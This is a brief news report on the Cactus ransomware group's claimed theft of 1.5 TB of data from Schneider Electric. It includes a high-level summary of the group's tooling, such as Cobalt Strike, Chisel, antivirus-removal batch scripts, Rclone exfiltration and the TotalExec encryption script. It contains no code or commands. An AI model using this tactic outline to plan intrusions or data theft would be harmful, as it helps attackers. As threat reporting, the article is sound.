Cactus Group robs 1.5TB of data from Schneider Electric, which specializes in energy and automation.

Ransomware group Cactus ransomware claims to have stolen 1.5 TB of data from energy management and industrial automation firm Schneider Electric.

Schneider Electric is a global company specializing in energy management, industrial automation and digital transformation.

In January of this year, BleepingComputer reported on a cyberattack that occurred on January 17 in the company's sustainability business unit. BleepingComputer contacted Schneider Electric, which confirmed the incident. The attack affected the services of Schneider Electric's cloud-based Resource Advisor platform, causing disruptions to its operations. The company says other business units were not affected by the attack.

Today, the ransomware group Cactus ransomware published 25MB of allegedly stolen data on the Tor website. The group also posted several photos of passports and company documents as proof of the hack.

Kroll researchers reported that the Cactus ransomware group has been active since March 2023 and is characterized by its use of encryption to protect the ransomware executable.

The ransomware identifies user accounts by looking at successful logins in Windows Event Viewer and also uses a modified version of the open-source PSnmap software. Cactus ransomware relies on several legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) for remote access and uses Cobalt Strike and the Chisel proxy tool for further actions after hacking.

When malware escalates privileges on a machine, attackers use a batch script to remove popular antivirus solutions. Cactus uses the Rclone tool for output and utilizes a PowerShell script called TotalExec, which was previously used by BlackBasta ransomware operators, to automate the encryption process.

In early January, ransomware group Cactus ransomware claimed to have hacked Coop, one of the largest retail and grocery suppliers in Sweden.